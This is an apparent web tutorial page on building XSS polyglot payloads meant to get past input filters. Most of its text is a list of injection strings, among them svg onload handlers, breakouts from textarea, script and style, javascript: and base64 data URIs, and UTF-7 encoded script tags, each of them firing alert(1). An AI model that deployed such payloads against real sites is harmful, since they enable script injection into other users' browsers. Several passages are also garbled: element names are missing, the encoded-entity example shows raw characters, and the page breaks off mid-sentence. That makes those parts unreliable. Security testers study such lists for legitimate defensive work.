Home >Web Front-end >JS Tutorial >Creating Powerful XSS Polyglots
Polyglot payloads leverage multiple encoding, injection, and obfuscation techniques to bypass filters, confuse parsers, and trigger execution across different contexts like HTML, JavaScript, CSS, JSON, etc.
-Merging Comment Styles
Polyglots often confuse parsers by merging different comment styles:
JavaScript: //, /* */ HTML: <!-- --> <!--<script>/*--><svg onload=alert(1)/*</script>-->
-Using Encoded Entities
Bypassing filters using HTML or URL encoding:
HTML: <, >, " URL: %3C, %3E, %22
<script>alert(1)</script>
-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.
"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--
-Breaking Out of Contexts
Escape from current contexts like textarea, script, or style.
</textarea><svg onload=alert(1)>
-Abusing HTML5 Elements
Using modern elements like , , or .
<svg onload=alert(1)></svg> <iframe srcdoc="<svg onload=alert(1)>"></iframe> <math><mtext><script>alert(1)</script></mtext></math>
-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.
<div class="x" onmouseover="alert(1)">
-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript.
</style><script>alert(1)</script><style>
-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.
<svg><image href="javascript:alert(1)"></svg>
<a href="javascript:alert(1)">Click me</a> <iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>
"onmouseover=\nalert(1)//"
*/ alert(1) /*
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
<iframe srcdoc="<script>alert(1)</script>"></iframe>
</textarea></script></iframe><svg onload=alert(1)>
Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use multiple elements like , ,